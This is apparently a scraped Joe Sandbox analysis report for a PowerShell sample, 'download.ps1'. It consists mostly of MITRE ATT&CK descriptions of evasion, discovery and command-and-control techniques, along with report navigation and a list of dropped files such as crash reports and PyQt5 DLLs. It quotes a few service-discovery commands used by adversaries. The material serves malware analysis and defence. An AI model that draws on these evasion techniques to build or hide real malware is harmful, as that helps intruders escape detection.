Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_050c5ae3-066e-4837-9ee8-2f0cf13d244e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_4c013ac5-7a2d-4e4f-873d-4fd4818d8838\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_559855e4-59d1-4ab8-901a-ddbaae339193\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F40.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80D7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8146.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB227.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB48A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4F8.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD167.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD253.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2C1.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\MSVCP140_1.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Core.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5DBus.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Gui.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Network.dll

C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5Qml.dll

Windows Analysis Report
download.ps1

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre